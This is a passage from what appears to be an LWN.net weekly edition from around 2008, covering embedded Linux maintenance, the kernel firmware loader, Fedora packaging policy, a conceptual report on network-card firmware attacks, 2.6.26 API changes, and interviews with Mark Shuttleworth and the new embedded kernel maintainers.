implement against an embedded Linux system would have taken more than 800k
lines of source patches to implement if the previous trail of patches had
been ignored."  How was that number arrived at?  Which security patch were
you describing?  How could it possibly require 800,000 lines of patches "to
implement" this security fix?


This example comes from a sequence back in 2006 (CVE-2006-1528 to be
precise), but the "problem" is just as true today. Here's the
setup:


A developer decides to use Linux and has taken the strategy of minimizing
their costs by using a community-maintained Linux kernel. (This story would
be true if the developer started with the typical semiconductor
distribution, by the way) The community has a good reputation for stability
and defect resolution and therefore the developers think they can minimize
their own effort. 

They start with Linux 2.6.10 and base their device
application software on this release. During testing, they notice a defect
and find that the defect has been identified (the good news) and fixed in
2.6.13 (the bad news). So now they have a problem, moving up to 2.6.13,
where the defect is fixed also introduces 846,233 new lines of code (the
delta between 2.6.10 and 2.6.13).

This magnitude of change restarts their
QA process, since so much code has changed in the underlying Linux
kernel. Their other choice is to backport the fix, which in this particular
case is 33 lines (we know because we did it), but now the developer has
taken on maintenance of their own Linux, which was what they were trying to
avoid in the first place. This drift between a Linux release you have
baselined and the fact that defects are often fixed in newer releases
presents a less than perfect set of choices for developers. Whether you
wanted to or not, you're in the Linux maintenance business. This drift
problem is true of many distributions, not just dealing with kernel.org.


If our customer found the same defect, we have the obligation to fix it in
the release that they purchased from us; we don't force them to
potentially destabilize their environment by sending them a newer kernel
release where the defect was originally fixed. I guess it all depends how
cavalier one is about changing your underlying operating system after
you've developed and tested your application. In general our customers
are very strict about minimizing changes, and so are we.


At least some of MontaVista's marketing would appear to focus on making
Linux look scary.  Are you not concerned that this approach might have the
effect of making Linux in general look less attractive and, thus, playing
into the hands of proprietary systems vendors?


No one is a bigger proponent of embedded Linux than MontaVista (and we have
the contributions to prove it). But it doesn't do us any good to have
folks try Linux, get over their heads and fail, and attribute that failure
to Linux. 


We have seen over the past 8 years any number of projects that got into
trouble by not understanding what to expect when they downloaded some Linux
and started in by themselves. In fact one of our very earliest customers,
back in 1999, had started off building their own Linux, and hit a hardware
integration bug that stopped them dead in their tracks for weeks, putting
their project in real trouble. Had we not been able to help them out, their
alternative was Windows CE. Ugh!


Why shouldn't many millions of lines of complex operating system code
that changes daily be a little scary, especially when your business is
making devices, not operating systems? I think it is a mistake to
"trivialize" the difficulty in owning large amounts of any software,
including Linux. That's why I think it's important for folks to be
well informed about what they are getting into, so they can make good
decisions on how they will approach using Linux for their system, whether
they do-it-themselves or go commercial. In either case we want them to
succeed.


Is there anything else you would like to pass on to LWN's readers?


We can all be quite proud of the enormous progress Linux has made in
transforming the embedded OS marketplace from one which was highly
fragmented and largely devoid of standards, to an environment based upon a
highly functional OS which is a truly open standard: Linux. A whole cast of
characters made this possible: visionary customers who dared think it was
possible to embed Linux in their devices, the semiconductor companies
making sure Linux was ported to their chips, commercial companies such as
MontaVista and others making rock solid distributions that were capable of
being deployed by the millions, and numerous individuals who made
significant contributions along the way. It's a pretty powerful
combination that's hard to beat.


We would like to thank Jim for taking the time to answer our questions.

		Using the firmware loader for static data


Some device drivers need firmware to load into the hardware at
initialization time.  The kernel firmware loader interface exists to
support that functionality, but it requires help from user space
which may not be available in all environments.  David Woodhouse has
proposed a patch that would
eliminate that requirement so that more drivers can use the firmware
loader rather than craft their own solution.

 Embedded devices will be one of the main users of this ability.  Many
of those do not have a user space filesystem available at boot
time—via initrd or initramfs—but they still need to access
firmware images to download to peripherals.  The new
request_firmware() implementation would allow those devices to
link the firmware into the kernel while still using the kernel firmware
infrastructure.  


Woodhouse has an excellent summary of what he is trying to do in the patch
posting:

Some drivers have their own hacks to bypass the kernel's firmware loader
and build their firmware into the kernel; this renders those unnecessary.

Other drivers don't use the firmware loader at all, because they always
want the firmware to be available. This allows them to start using the
firmware loader.

A third set of drivers already use the firmware loader, but can't be
used without help from userspace, which sometimes requires an initrd.
This allows them to work in a static kernel.


A driver that has static firmware data, declares it using:

The firmware_name is used as a key to find the specific firmware
when request_firmware() is called.  blob is a pointer to
the actual code.  The declaration adds the firmware to the end of an array
holding struct builtin_fw elements, which look like this:


When a call is made to request_firmware(), the new code linearly
searches the array for a matching key before calling out to user space.
This allows any statically created firmware blobs to take precedence over
those in the filesystem.  Whichever is found is returned.


There seemed to be strong agreement that Woodhouse's approach was the right
way to go.  His original implementation copied
the firmware blob before returning it to a request_firmware()
caller which required a vmalloc()—a waste of precious memory
on embedded devices.
Woodhouse was concerned that some drivers might modify the firmware before
loading it into the device.  Once he started looking, he found examples of
that, but instead of penalizing all devices, he changed the firmware data
returned in a struct firmware to be constant, resulting in the
following structure:


This constitutes an API change for anyone using the
request_firmware() interface.  In-tree drivers have been modified
by Woodhouse appropriately, but out-of-tree drivers need to be aware of the
change. Any driver that needs to modify the data
must make a copy for themselves.


Another feature that would be useful for memory-constrained devices is
compression of the firmware in the kernel image.  This is on Woodhouse's radar, but is not seen as a feature that must be
in the first release.  Not copying the data for most drivers is
a bigger win, but compression, especially for large firmware images might
help.  In those cases, though, both the compressed and uncompressed data
will be in memory while the driver is downloading it.


Getting this work included into 2.6.26 has been discussed, even though the
merge window has closed.  Woodhouse thinks
it might be possible:

Well, it's supposedly too late, but it's dead simple and shouldn't have
much chance of breaking anything, so I suppose as long as we don't
include the korg1212 patch and the rest of the similar patches which
we're still working on, that's not such an insane request.


This is a fairly simple patch that adds some very useful functionality,
especially for the embedded community.  Woodhouse has recently stepped up as one the kernel
embedded maintainers, so we may see more things like this from him in
the future.  It is unlikely that Linus Torvalds will merge this
feature 
so late in the 2.6.26 cycle, but inclusion into 2.6.27 seems quite probable.


		Fedora's Packager Sponsors Responsibility Policy


A Linux distribution is really the sum of its packages.  The more packages
that are available, the more useful it becomes for a wide range of needs.
Case in point, Debian has some 20,000 plus packages
available to it's users, and to the wide variety of Debian-based
distributions.

Fedora doesn't have quite as many
packages available (yet), but the project hasn't been working at it for
nearly as long either.  Of course having thousands of packages available is
no good if they won't interact well with each other.  A distribution isn't
just a collection of random binary packages.  Packaging guidelines are
critical for ensuring that any package you (the user) installs, works well
with the rest of your system.

Fedora is working toward having an ever growing number of volunteers
maintaining an ever growing number of packages, and still having an
integrated distribution that works whether you want the "Everything Spin"
or one of the highly specialized Spins, or something in between.

One part of making that happen is having sponsors for new volunteers, and
coming up with a policy to guide these sponsors.  A draft version of the Packager Sponsors
Responsibility Policy was posted to Fedora-devel late last week.  The wiki version contains some additions and clarifications.

With the new policy, sponsors are maintainers with a good record of package
maintenance and have shown a willingness to review packages and assist
others.  Sponsors act as mentors for new contributors, as package reviewers
and ultimately they are responsible for making sure that bugs are fixed in
their sponsored packages.

The policy also indicates some conditions where a sponsorship might be
revoked:

  A maintainer that no longer wishes to contribute to Fedora, a maintainer
  that refuses to follow guidelines, or irreconcilable differences between
  the maintainer and the Sponsor. In this event it is the responsibility of
  the Sponsor to orphan the maintainers packages, and do any other needed
  cleanups.


Like all such policies, it will evolve over time, but all in all it is a
good start to a policy that should help new maintainers get involved with
the Fedora project.

		Attacking network cards


When considering the vulnerabilities of a system, the hardware is usually
ignored.  Software certainly presents the biggest target—fairly easily
exploited as we have seen—but a new class of attacks goes directly at
the hardware, specifically network cards.  The results can range from a
permanent denial-of-service to a complete compromise of the card's
function.


One researcher has overly cutely dubbed this kind of attack "phlashing"
because it attacks the firmware on the card, which is typically stored in
flash.  The basic idea is that an attacker will rewrite the firmware using
an image under their control.  That image could do any number of fairly
nasty things to the card.


Two separate researchers have recently reported on their explorations into this
type of attack.  Arrigo Triulzi's posting to the, evidently private, Robust
Open Source mailing list was reported
on Ben Laurie's weblog.  Rich Smith of HP also gave a talk on
his PhlashDance fuzzing tool at the EuSecWest conference.  In both
cases, network devices were compromised via insecure remote firmware update
capabilities. 


Smith's research focuses on causing permanent denial-of-service through
overwriting the firmware, presumably with garbage.  At that point, the card
will no longer function and may, in fact, no longer be able to be
updated—remotely or locally—which turns it into a paperweight.
More importantly, no network traffic can use the device, so if it is
situated in a critical router, for example, it could affect a large number
of systems.


A more insidious attack is described by Triulzi.  He replaces the firmware
with new code, effectively reprogramming the device to do whatever he
wants.  One of the attacks goes like this:

[...] I've reached my goal of writing a totally transparent firewall bypass
engine for those firewalls which are PC-based: you simply overwrite the
firmware in both NICs and then perform PCI-to-PCI transfers between the two
cards for suitably formatted IP packets (modern NICs have IP "offload
engines" in hardware and therefore can trigger on incoming and outgoing
packets). The resulting "Jedi Packet Trick" (sorry, couldn't resist) fools,
amongst others, CheckPoint FW-1, Linux-based Strongwall, etc. This is of
course obvious as none of them check PCI-to-PCI transfers.


An additional trick, noted by Laurie and others is to use those same
techniques to read or write the main memory of the host computer.  This
could certainly allow sensitive information to leak—or the host
itself to
be
compromised.  As Laurie says: "You might even be able to read
disk, too, depending on the disk controller."


This is truly frightening stuff that is flying under the radar of most
network administrators.  There are no known attacks in the wild, but it
would seem only a matter of time before that happens.  This is definitely
something to keep an eye on.


Other than avoiding vulnerable network hardware—lists of which do not
seem to be available from either researcher—there doesn't seem to be
much that can be done to deal with phlashing attacks.  A properly
programmed I/O memory
management unit (IOMMU) might alleviate some of the worst cases by
disallowing DMA outside of approved ranges, but card vendors need to make
updates more difficult.  It might be more convenient for an administrator
of a large network to update multiple cards across the wire, but the price
paid for that convenience seems too high.


		A summary of 2.6.26 API changes


The 2.6.26 development cycle has stabilized to the point that it's possible
to look at the internal API changes which have resulted.  They include:


 At long last, support for the KGDB interactive debugger has been 
     added to the x86 architecture.  There is a DocBook document in the
     Documentation directory which provides an overview on how to use this
     new facility.  Some useful features (e.g. KGDB over Ethernet) are not
     yet supported, but this is a good start.

 Page attribute table (PAT) support is also (again, at long last)
     available for the x86 architecture.  PATs allow for fine-grained
     control of memory caching behavior with more flexibility than the
     older MTRR feature.  See Documentation/x86/pat.txt for more
     information. 

 ioremap() on the x86 architecture will now always return an 
     uncached mapping.  Previously, it had taken a more relaxed approach,
     leaving the caching as the BIOS had set it up.  The practical result
     was to almost always create uncached mappings, but with
     occasional exceptions.  Drivers which depend on a cached mapping will
     now break; they will need to use ioremap_cache() instead.
     See this article for
     more information on this change and caching in general.

 The generic semaphores
     patch has been merged.  The semaphore code also has new
     down_killable() and down_timeout() functions.

 The final users of struct class_device have been converted to
     use struct device instead.  The class_device
     structure, along with its associated infrastructure, has been
     removed. 

 The nopage() virtual memory area operation has been removed;
     all in-tree code is now using fault() instead.

 The object debugging
     infrastructure has been merged.


 Two new functions (inode_getsecid() and
     ipc_getsecid()), added to support security modules and the
     audit code, provide general access to security IDs associated with
     inodes and IPC objects.  A number of superblock-related LSM callbacks
     now take a struct path pointer instead of struct
     nameidata.  There is also a new set of hooks providing
     generic audit support in the security module framework.

 The now-unused ieee80211 software MAC layer has been removed; all of
     the drivers which needed it have been converted to mac80211.  Also
     removed are the sk98lin network driver (in favor of skge) and bcm43xx
     (replaced by b43 and b43legacy).

 The ata_port_operations structure used by libata drivers now
     supports a simple sort of operation inheritance, making it easier to
     write drivers which are "almost like" existing code, but with small
     differences. 

 A new function (ns_to_ktime()) converts a time value in
     nanoseconds to ktime_t.

 Greg Kroah-Hartman is no longer the PCI subsystem maintainer, having
     passed that responsibility on to Jesse Barnes.

 The seq_file code now accepts a return value of SEQ_SKIP from
     the show() callback; that value causes any accumulated output
     from that call to be discarded.

 The Video4Linux2 API now defines a set of controls for camera devices; 
     they allow user space to work with parameters like exposure type, tilt
     and pan, focus, and more.

 On the x86 architecture, there is a new configuration parameter which
     allows gcc to make its own decisions about the inlining of functions,
     even when functions are declared inline.  In some cases, this
     option can reduce the size of the kernel's text segment by over 2%.

 The legacy IDE layer has gone through a lot of internal changes which
     will break any remaining out-of-tree IDE drivers.

 A condition which triggers a warning from WARN_ON will now
     also taint the kernel.

 The get_info() interface for /proc files has been
     removed.  There is also a new function for creating /proc
     files:


     This version adds the data pointer, ensuring that it will be
     set in the resulting proc_dir_entry structure before user
     space can try to access it.

 The klist type now has the usual-form macros for declaration and 
     initialization: DEFINE_KLIST() and KLIST_INIT().
     Two new functions (klist_add_after() and
     klist_add_before()) can be used to add entries to a klist in
     a specific position.

 kmap_atomic_to_page() is no longer exported to modules.

 There are some new generic functions for performing 64-bit integer
     division in the kernel:


     Unlike do_div(), these functions are explicit about whether
     signed or unsigned math is being done.  The x86-specific
     div_long_long_rem() has been removed in favor of these new
     functions.

 There is a new string function:


     It compares the two strings while ignoring an optional trailing
     newline. 

 The prototype for i2c probe() methods has changed:


     The new id argument supports i2c device name aliasing.


One change which did not happen in the end was the change to 4K
kernel stacks by default on the x86 architecture.  This is still a desired
long-term goal, but it is hard to say when the developers might have enough
confidence to make this change.

		Mark Shuttleworth on the future of Ubuntu


The life of South African Mark Shuttleworth has been a kind of geek dream: found and sell Internet company for $500+ million in mid-20s; spend $20 million to become the second space tourist; and create a GNU/Linux distribution with a cool name that has become the most popular on the desktop. 


Here, he talks to Glyn Moody about Ubuntu's new focus on the server side, why Ubuntu could switch from GNOME to KDE, and what happens to Ubuntu and its commercial arm, Canonical, if Shuttleworth were to fall out of a spaceship.

<!-- LWNPutAdHere -->

I believe you made about $500 million when you sold the certificate authority Thawte Consulting to Verisign in 1999. Creating a GNU/Linux distribution is not the most obvious follow-up to that: what were the steps that led from the early part of your life to the current phase?


I have a belief that we should all paint our lives as boldly as we can, and we should explore the things that are the most interesting to us personally. I'm always disappointed when I see people asking the question: "What's going to be the next big thing? What career should I choose? Where will the most money be paid?"

It's impossible to know what the future holds, but it's very possible to know what you might be personally interested in. So after Thawte, I spent some time setting up the [Shuttleworth] Foundation and some time setting up the [HBD] Venture Capital group, which I wasn't going to run personally, but which I thought was a good thing to have, and put a team in place to do that.

And then I thought: what are the most interesting challenges out there, what are the opportunities that I'm sort of uniquely positioned to do? And the opportunity to go to Russia and train there and then fly was the opportunity that I chose.

After that, it was more difficult. There were three things that I was looking at. Each of them was exploring the impact of the Internet in society and in commerce, but in different ways. And of all of them, [Ubuntu] is the project I thought was the most interesting, the most difficult, the biggest scale project. And ultimately, if we succeed, the one that will have the biggest impact. So I took this one on.

Given that Ubuntu's roots are on the desktop, what's behind the recent shift in strategy to address the server side too?


That's not a change in strategy, it's more a pull through. We started with a very narrow focus on the desktop, and that allowed us to punch in. As we've penetrated the industry, there's a natural pull through where someone who's started using us on their desktop has now started setting up Ubuntu on a server.

You could always run Ubuntu on a server; there was never a significant reason not to. That body of users has now reached a critical mass on the server, and so our server work is now more responding to that than a shift in strategy. We continue to make the desktop our labor of love, the server requires a very enterprise-oriented approach.  We've built out a dedicated team that just handles that. We haven't re-assigned people who are desktop specialists and asked them to test a server.

You're not worried you're spreading yourselves to thinly?


That is a risk, and that's something we discuss here a lot. There are benefits to offering a platform that can be used in both configurations. We see companies often saying: "We love your desktop. We would definitely choose your desktop if we could also use you on the server."

Companies don't like to introduce arbitrary diversity in technology. Everybody has heterogeneous systems, but they don't like to make that situation worse without a very good reason for it. Ubuntu is a very good server for certain use-cases now, just like Ubuntu is a very good desktop for certain use-cases. Our challenge over the next couple of years is just to broaden the base to which it appeals on both fronts.

On the server, it's very much a question of taking time to build the portfolio of relationships with other vendors. There are a lot of applications - what we call solutions - which are now free software-based: standard web-serving, mail-serving and so on. Ubuntu does very well for those. Increasingly, the challenge for us now is to build out the portfolio of non-free software certifications, everything from Oracle through SAP and thousands and thousands of pieces in between. That will take time; it's not something we can achieve overnight.

One of the interesting things you've floated recently is the idea of coordinated releases amongst GNU/Linux distributions. Where did the idea come from, and what would the benefits be?


[PULL QUOTE: 
That's really what Ubuntu's all about. We want to express fully the real nature of free software, as a true commercial, economic entity in its own right.
 END QUOTE]


What I'm really, profoundly interested in, is how a different approach to technology makes new things possible.

The business model of the proprietary software industry is licensing software to new customers or updates of software to existing customers. You make money when you have a new version. So there's an imperative both to release new versions and to have a whole bunch of new features in those versions, specific features that you articulate in advance.

In the free software world, we don't have that to cloud our thinking. We accept that development goes at the pace that it goes. If we operate on a basis that we only integrate new features into the platform when we consider them ready, then we can effectively release the platform at any time. When you look at the world though those glasses, it makes sense then to articulate not that you'll ship the product when you have certain features, but you'll ship it at a certain time.  That's actually really useful to all of your users, because they can plan for a particular time. This wasn't our stroke of genius: GNOME was the one that really championed this idea. 

We took the fairly radical step of saying we could do that across the whole ecosystem.  The reason that is radical is because when you're one project, you can make decisions for yourself. But obviously as Ubuntu, we aggregate everyone from the Linux kernel to the GNOME project through the Firefox web browser and the Apache web server, and a ton of stuff in between. So people said: "How on earth will you tell them when to ship their stuff so that you can ship what you want?"

We've simply taken the view that we have a very carefully-managed release process, and a new version from one of those projects just doesn't get in unless it's ready at the time it needs to be ready for us to have confidence that it can be integrated and tested.

What this has really done is it's separated, very elegantly, the processes associated with R&amp;D, which is focused on what new features we're going to develop, and how to manage that, which is very difficult to put on a particular schedule, from the process of integration, testing and distribution.

Now, if I look at a company like Oracle or Microsoft, they have both of those responsibilities. So you end up in this horrible situation where they start saying now: "you'll have the next generation file system in this version and it'll ship on that date." And then reality intervenes, and that puts them in a very awkward situation. We just don't have that.

To come back to the original idea, we try to understand what's the essential difference between the way we produce software and the way other people produce software, and what becomes possible because of that, that wasn't possible before, both economically and technologically. That's really what Ubuntu's all about. We want to express fully the real nature of free software, as a true commercial, economic entity in its own right.

Have you had any feedback yet from the other distributions?


Not yet, no. This is something that we've only just started articulating. My hope is that other distributions will see the benefits of synchronizing all of our releases. It doesn't matter whose cycle we converge on, but the idea of synchronizing releases then cues all of those thousands of other projects, that if they want their latest technology shipped by a particular date, if they're able to get it done by a particular time, then that will happen not just with Ubuntu, but with a whole bunch of different platforms. I think it's a powerful idea.

There are commercial interests that might block it. It will be interesting to see if the other commercial distributions are nervous to put themselves in a situation where they really are being compared, apples to apples. We'll see.

Given that more and more computing will be done in the cloud, is that going to be a threat or an opportunity for Ubuntu?


It's a real opportunity, both on the server side and on the client side. To build a server-side cloud infrastructure, you want an operating system which is not licensed per seat or per processor or per machine or per instance. It is simply freely available with all of its updates, and Ubuntu meets that.

You can go from a hundred instances in the cloud to a hundred thousand instances in the cloud and legally pay Canonical no more money. You will probably want to have some sort of support relationship with us, but that's entirely separate from the actual licensing of the platform, and it's not required in any way. We cut a deal to support you in the way that you need support.

So, economically on the server side that's a very big winner, and Ubuntu is seeing a lot of adoption and traction there. You also want something that can be shrunk down so that in your cloud server you only have the pieces which you really need. Every extra piece is an extra piece of disk space that's not being used; it's an extra piece of memory that's not being used. It's an extra thing that can have a security issue that's not being used. And so you may as well get rid of it. Ubuntu's very modular - probably the most modular of the commercial platforms; this comes from our Debian heritage.

On the client side, for cloud computing you really want something that "speaks the Internet", and does so very well and very securely, and speaks the web very well and very securely. Ubuntu running Firefox is a really compelling option there. 

So I think there's a good chance that the next YouTube is running in the cloud and running on Ubuntu.

One of the versions of Ubuntu is Gobuntu, which has no non-free elements whereas Ubuntu does have some. Where do you stand on the question of including proprietary elements in a free software distribution?


[PULL QUOTE: 
But we are willing to put in drivers that are not yet open source, because we figure it's more important to give everybody's grandma the opportunity to actually run free software applications on a free software environment, even if they need some proprietary drivers to get their hardware going. That puts us squarely in the pragmatist camp rather than the purist camp. 
 END QUOTE]


Very clearly, I'm a pragmatist. The non-free pieces of Ubuntu are nothing to do with Canonical's commercial interests. It's not like we've put pieces in there that suit us and don't suit anybody else. They're drivers for hardware where the manufacturers of that hardware haven't yet wrapped their heads around the idea of releasing the source code that makes their hardware work. They're not applications.

We work with those vendors to help them understand that in fact it's to their advantage to make their source code open source. They will get much better quality. We have real examples of this. We have much better quality drivers with much better reliability that make their hardware more attractive to a bigger portion of the market.

But we are willing to put in drivers that are not yet open source, because we figure it's more important to give everybody's grandma the opportunity to actually run free software applications on a free software environment, even if they need some proprietary drivers to get their hardware going. That puts us squarely in the pragmatist camp rather than the purist camp. 

Gobuntu is an attempt to create a version of Ubuntu that does away with that, but also that is specifically designed to be a platform where other ideas about Copyleft can be explored - this meme about collaborative creation of something is extremely powerful and software is just the tip of the iceberg - we've already seen Wikipedia. I think every industry is going to need to adjust its thinking to say: "How can this participative computing phenomenon energize us?"

Gobuntu aimed to do that. People didn't really flock to it, so I think we will stop doing Gobuntu. People liked the idea, but not the people who would actually invest their time in it. I think it's too closely associated with Ubuntu. There's another one called gNewSense, which is exactly the same - Ubuntu with all the non-free stuff taken out. But because it's a separate organization, people feel more comfortable participating there. I don't mind, really.

On a related issue, do you worry that GNOME is becoming too involved and enmeshed with Microsoft technologies? If the patent problem with GNOME becomes too great, might you switch to KDE one day?


I think it's very healthy that we have multiple desktop platforms, and that they're both committed to free software and sources of innovation and inspiration and competition. We picked GNOME mostly because of its approach to the release cycle and because it had a real strong commitment back in 2004 to usability.

Since then, KDE has also embraced the idea of usability as a primary driver, and they've done some really interesting things on the technology front. I keep a level of awareness of KDE, and I run KDE at home just to make sure I have a sense of where it's going and how it is doing. I like the rivalry. We might [switch]; it's good to have that option. 

As for patents in software, I think society does a very bad deal when it gives someone a monopoly in exchange for nothing. The traditional patent deal was you gave someone a monopoly in exchange for disclosure of a trade secret. You can't really have trade secrets in software.

Of course, the entrenched interests like to frame this as "patents are all about innovation", when they really aren't. There's very strong, academic, peer-reviewed research that suggests that patents stifle the pace of change and innovation. 

The real insight with patents is that what society is buying with that monopoly is disclosure. And so the real benefit to society is accelerated disclosure of new ideas - not convincing people to invest. People have ideas all the time. You can't stop the human mind from innovating. People do research and development to win customers, that's what it's really about. It's not to file patents. So the entrenched patent holders really aren't doing much of a service to society when they articulate their position in very flawed terms.

With regard to GNOME and Microsoft, I'm not concerned. My view is that to win, you have to have your own vision. You have to have a very clear idea of what you can deliver that's unique. You can't go around sort of chasing someone else's coat tails.  So while I respect the people in the free software community who invest a lot of time in making compatible implementations of other people's technology, I don't think that's the real recipe for success for free software. We have to give people a reason to use our platform for itself, not because it's a cheap version of someone else's.

And in fact, the real successes of free software have been the places where it has just blown away the alternatives. The Internet runs on free software, and not because it has copied anything from Microsoft. The proprietary software guys like to accuse free software of not innovating and not doing anything other than sort of walking down the same path that they've already walked, which is always easier. That's just not true, but guys like the Mono Project are reinforcing that stereotype.

Finally, one of the issues that has traditionally preoccupied the Linux community is: what happens if Linus falls under a bus? So I was wondering what happens to Canonical and Ubuntu if you fall under a spaceship or something?


Fall *out* of a spaceship! Well, I've made suitable preparations so that if I'm looking the wrong way when the bus comes, economically both Canonical and Ubuntu are fine: there are provisions in my will to make any additional investments needed. 

As to the other things that I do for the project, they will have to find someone else to step into my shoes. You know, there's a lot of good talent, and both technically and commercially and socially. I think the project would continue.

Glyn Moody writes about open source at opendotdotdot.

		An interview with the new embedded maintainers


Embedded Linux is getting a lot of attention these days.  A new kernel.org
mailing list, linux-embedded—archived
here—has been set up, with discussions and patches already being
posted.  In addition, Paul Gortmaker and David Woodhouse have volunteered
to be the "embedded maintainers" for the kernel to help coordinate the embedded
Linux community.  They graciously agreed to a joint email interview to shed
some light on their new roles.

LWN:  What is your background with Linux, especially with embedded
Linux? 


David: I got involved in Linux while I was at University, and ended
up working
at Nortel during one of the summer vacations, on a project for
networking over mains power lines. It involved Linux boxes as routers,
and I was working on solid state storage for that. From that, and from
the basic support we had for similar devices in the PCMCIA code base,
the MTD [Memory Technology Device] subsystem grew.

After a while, I ended up working for Red Hat's engineering services
division, doing board ports, drivers and other work. That's when JFFS2
was written, as part of a customer contract.

I've been at Red Hat since 2000, in various rôles including spending
most of the last couple of years on OLPC. Due to HR misconduct, I
handed in my notice on Monday and will be going elsewhere. I spoke to my
new boss before volunteering for the 'embedded maintainer' rôle, and he
was happy with that—it's another Linux-friendly company where I'll be
doing kernel development, and community interaction will continue to be
part of my day job.


Paul: I started using Linux back in the pre 1.0 days, and having
always been one to
take things apart and see how it works, being able to do that with the OS
appealed to me.  I put together various documents to help people back when
the
entry level into Linux was quite high, started fixing and writing drivers,
and
on it went from there.  In 2005, I joined Wind River, where I've been
primarily
focused on kernel and board specific kernel patches, and this has given me
the
opportunity to be exposed to all the different architectures and lots of
board variants within each architecture family.


LWN: What is the role you see for the embedded Linux maintainers for
the kernel?


David: A bunch of things really. It's not like a normal maintainer
rôle where
we take ownership of a certain section of code; it's a bit more fluid.

To start with, one of the things we really need to do is work with the
various people who are using Linux in "embedded" situations, and help
them to work better with the community. That isn't just the vendors of
consumer equipment—it's communities like OpenWRT, handhelds.org, OLPC
too. In no other field is the development of the Linux kernel so
balkanised, with people all over the place carrying their own patches or
even full trees of code.

Another part of the job, which is actually something I've been doing for
years anyway, is reviewing general changes in the kernel with a
particular mind to how they affect embedded systems. That's not just
bloatwatch, although obviously that's a part of it. It also covers
things like watching the IBM zSeries folks provide execute-in-place
support for block devices under z/VM, and saying "hey, how can we use the
same memory management for XIP from flash?".

The other main part of it is implementing features in the core kernel
which are motivated by "embedded" requirements. Like the tricks for
compiling parts of the kernel with "-fwhole-program --combine" to let
GCC optimise better and reduce code size, for example.

A certain amount of it, especially the new
linux-embedded@vger.kernel.org list, I expect to be a kind of targeted
kernelnewbies—but obviously with a more specific focus on embedded
issues, and to a certain extent on professional developers rather than
having such a high proportion of hobbyists. Although I certainly
wouldn't want to discourage the hobbyists and students from getting
involved with embedded. It's a good way to get people to send you cute
toys, after all!

I was trying to avoid having a 'linux-embedded' git tree, but for small
things like the patch Tim Bird just sent to the linux-embedded list to
introduce CONFIG_CONSOLE_TRANSLATIONS, I suppose it makes sense—so
I've created that at git://git.infradead.org/embedded-2.6.git.


Paul: There are several things that can be done here that will all
benefit Linux and
its users in the end.  To start with, I'm hoping that we can close some of
the
entry level gap between people who don't necessarily track kernel
development
but yet have decided to develop on Linux with a specific embedded use case
in
mind, and those people who are long time Linux developers.  We can also
improve
the linkage between people writing feature changes and some of the users of
those features who are likely to be impacted, but otherwise would probably
go
unheard from.  We can also look at externally maintained features of
interest
to embedded users, and try and determine what is the blocking factor that
is
stopping it (or parts of it) from being merged upstream, and then assist in
removing those barriers where possible.


LWN: What are the specific problems that are faced by embedded
developers
trying to use Linux?  What can you do to make that situation better?


David: I think the biggest single problem has always been the same—it's that
people are too focused on getting their stuff out the door as quickly as
possible without much thought to working with upstream. Managers aren't
budgeting the time to get things merged, and engineers aren't talking
about their design early enough that it can be improved before it's a
fait accompli.

That extra time isn't just about being a good citizen—failing to do
it almost always comes back to bite you personally, when you come to
do a new product, a product update, or even need to merge in changes
from upstream to fix bugs. But everybody seems to need to learn that
the hard way, it seems.


Paul: A lot of times, you get the situation where a group who is
developing for an
embedded platform is focused 100% on getting their product up, running and
deployed.  The developers involved aren't necessarily hard core Linux
folks,
and it usually plays out by them picking a kernel version, getting their
stuff
in their local tree, and that is it.  They may not know git, they probably
don't have insight into who the respective subsystem maintainers are, they
may
perceive LKML as too hostile, or they may not have management buy-in on
trying
to push stuff upstream.  But inevitably, some time passes, and then they
have a
carry forward task where they try and do a big jump uprev of all their
changes,
and this repeats forever. 

Most people who have had to endure the jump uprev vs. a continual tracking
and
carrying of changes will tell you the jump is not the way to go for a
multitude
of reasons, but it seems a lesson that everybody ends up having to learn on
their own.  So, I'm hoping we can get some of these people more aligned
with
the typical Linux developer workflow—i.e. work from the latest codebase,
create logical changesets that can be submission candidates etc.  I've been
in
a couple of meetings recently where we've had the opportunity to educate
embedded developers on the advantages of doing this, and the feedback has
been
positive so far.


LWN: The size of the kernel is getting larger in general, is it
getting 
too big for some embedded applications?  What, if anything, should 
be done to remedy that situation?


David: I know there are people who'll want to take me out back and
shoot me for
this, but I think a large part of the solution to that is knowing when
Linux is the answer, and accepting that sometimes it isn't. I've always
been a bit dubious about implementing XIP support in Linux, for example,
on the basis that if you care that much, you should probably have been
using something like eCos anyway.

Getting back to the real question, though, there are things we can do.
The smaller, more efficient "slub" memory allocator is an example, as is the
--combine thing I mentioned above. The trick is to find ways to improve
matters without just littering the whole thing with ifdefs.


Paul: There will always be some hardware or some use case where
Linux isn't
the right choice.  It only makes sense to use the right tool for the
job.  However we do want to make sure that Linux is that right tool in
as many cases as possible.   On the plus side, the resources that are
found on a typical embedded target today are a lot more rich than they
were years ago.  We just need to make sure that in optimizing for the
general x86 use case, we don't inadvertently hinder these more fringe
use cases coming from the embedded world.


LWN: What do you see as the priorities for kernel work to better
support
embedded Linux?


David: One important priority right now is replacing JFFS2. I wrote
it, so I'm
allowed to say that—it was good for its time, with NOR flash devices
on the order of 32MiB. But having made it work on 1GiB of NAND flash in
OLPC, I certainly agree with the observation that it's being pushed past
its design limits. I'm very keen to get LogFS and/or UBIFS merged into
the kernel and stabilised to the point where we can really start moving
to them.

We need to revamp the MTD API fairly urgently too. It was derived from
the PCMCIA code we had at the time without much planning, and we really
need to improve on it now.

There may be a certain amount of bias in the items I've picked out, I
suppose.


Paul: The embedded community as a whole is probably the biggest user
of all the
architectures outside of the x86 based platforms.  Sometimes the
functionality
of certain things don't get much testing outside of the basic x86 family.
For
example, one of the features that there is considerable interest in is the
full
preempt_rt patch set.  Yet once you stray outside of the x86 family, you
are
pretty much guaranteed to run into drivers specific to embedded targets
that
don't play nice once this patch set is in place.  This isn't such a
surprise,
simply because the intersection of the two hasn't been explored yet.  I
think
there is value here in getting these types of intersections explored sooner
rather than later, by reducing some of the gap between the people working
on
these sorts of features, and those intending to use them on embedded platforms.


LWN: Do you have any specific goals for timelines of getting various
features merged?


David: Other than "ASAP" for LogFS and UBIFS, not particularly.
Stuff is merged when it's ready. 


Paul: At this point in time, no.  I'm not really interested in
hijacking anyone's
project or feature and trying to drive it towards some self-imposed merge
deadline.  I'd rather work with them to try and find out what the problem
areas
are, help with those where possible, be they logistical or technical and
get
them to a point where they feel that they can offer up merge candidates.


LWN: What problems do you foresee in working with other kernel
developers 
who may have less (or no) interest in the concerns of the embedded 
community?  Are there specific features that may be difficult or 
impossible to get merged?


David: I know it's fashionable to claim there's a big disconnect
between
embedded and big-iron users, but actually there's a lot more overlap
